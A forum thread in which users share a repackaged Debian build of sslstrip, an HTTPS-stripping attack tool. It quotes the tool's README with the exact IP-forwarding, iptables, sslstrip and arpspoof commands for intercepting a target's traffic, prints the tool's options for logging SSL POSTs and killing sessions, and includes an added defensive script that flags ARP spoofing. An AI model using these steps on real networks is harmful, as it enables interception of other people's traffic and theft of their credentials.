Posts: 88 | Thanked: 63 times | Joined on Feb 2008 @ Solingen; Germany
#1
As someone on IRC asked for sslstrip I now took some time and repackaged the package from blackbox PPA to make it work with debhelper5.

#################

This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.

Requirements

Python >= 2.5 (apt-get install python)
The python "twisted-web" module (apt-get install python-twisted-web)

Setup

tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install

Running sslstrip

Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
Set up iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
Run sslstrip. (sslstrip.py -l <listenPort>)
Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

[ http://www.thoughtcrime.org/software/sslstrip/ ]
Attached Files
File Type: gz sslstrip0.9_packages+source.tar.gz (141.8 KB, 144 views)
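
The "How does this work?" passage above depends on a host accepting another machine's MAC address as the router's, which is visible in the victim's neighbour table. The following is an added example for spotting that condition, not part of the original post or of the sslstrip project; the addresses, interface name and `ip neigh` snapshots are constructed sample data.

```python
import re

# Constructed sample neighbour tables in `ip neigh` output format (not captured data).
BEFORE = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.23 dev wlan0 lladdr aa:bb:cc:00:00:23 STALE
192.168.1.42 dev wlan0 lladdr aa:bb:cc:00:00:42 REACHABLE
"""
AFTER = """\
192.168.1.1 dev wlan0 lladdr aa:bb:cc:00:00:42 REACHABLE
192.168.1.23 dev wlan0 lladdr aa:bb:cc:00:00:23 STALE
192.168.1.42 dev wlan0 lladdr aa:bb:cc:00:00:42 REACHABLE
192.168.1.77 dev wlan0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m.group("ip")] = m.group("mac").lower()
    return table

def arp_alerts(baseline, current, gateway_ip):
    """Compare two neighbour tables and describe signs of ARP spoofing."""
    alerts = []
    old, new = baseline.get(gateway_ip), current.get(gateway_ip)
    if old and new and old != new:
        alerts.append(f"gateway {gateway_ip} moved from {old} to {new}")
    # One MAC answering for the gateway and for another host is the
    # situation the README describes: a host claiming the router's address.
    if new:
        for ip, mac in sorted(current.items()):
            if ip != gateway_ip and mac == new:
                alerts.append(f"{ip} shares MAC {mac} with gateway {gateway_ip}")
    return alerts

if __name__ == "__main__":
    for alert in arp_alerts(parse_neigh(BEFORE), parse_neigh(AFTER), "192.168.1.1"):
        print("ALERT:", alert)
```

Router failover and proxy ARP can also change or share the gateway's MAC, so an alert here is a prompt to verify the gateway's address rather than proof of interception.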
 
Posts: 458 | Thanked: 783 times | Joined on Jan 2010 @ France
#2
Well,

Here is the answer of the 'someone' guy

All goes well, except the link to the binary doesn't work & removing the package leaves the installation directory ...

Googling a little taught me how to make 'postinst' & 'prerm' scripts fixing the problem ...

Look in the attachment for the fixed package with source ...

So to be clear, right now:

Code:
-bash-2.05b# dpkg -i sslstrip_0.9-1_all.deb && sslstrip --help
Selecting previously deselected package sslstrip.
(Reading database ... 38833 files and directories currently installed.)
Unpacking sslstrip (from sslstrip_0.9-1_all.deb) ...
Setting up sslstrip (0.9-1) ...

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

-bash-2.05b#

A++
Attached Files
File Type: gz sslstrip0.9_packages+source.tar.gz (104.1 KB, 95 views)

Last edited by colin.stephane; 2011-07-19 at 18:48. Reason: Fixing also the deletion of package directory when purging ...